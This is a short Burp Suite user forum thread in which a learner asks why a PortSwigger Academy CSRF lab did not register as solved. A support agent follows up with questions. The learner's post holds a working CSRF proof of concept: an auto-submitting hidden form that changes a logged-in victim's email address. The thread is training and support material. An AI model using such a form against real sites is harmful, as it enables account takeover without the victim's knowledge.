Burp Suite User Forum

Create new post

i solve the lab CSRF where token validation depends on token being present but i site dont show lab solved

Eternal | Last updated: Oct 14, 2024 12:33PM UTC

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a8500bb031f49e28188660500e300ba.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="etroon&#64;gmail&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Michelle, PortSwigger Agent | Last updated: Oct 14, 2024 04:12PM UTC

Hi Can you tell us a little bit more about the steps you were taking? After testing the exploit on yourself, did you change the email address used in the exploit? If you check the logs for the exploit server, d you see the victim visiting the exploit server?

Eternal | Last updated: Oct 15, 2024 03:09PM UTC

yeah get fixed thanks

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.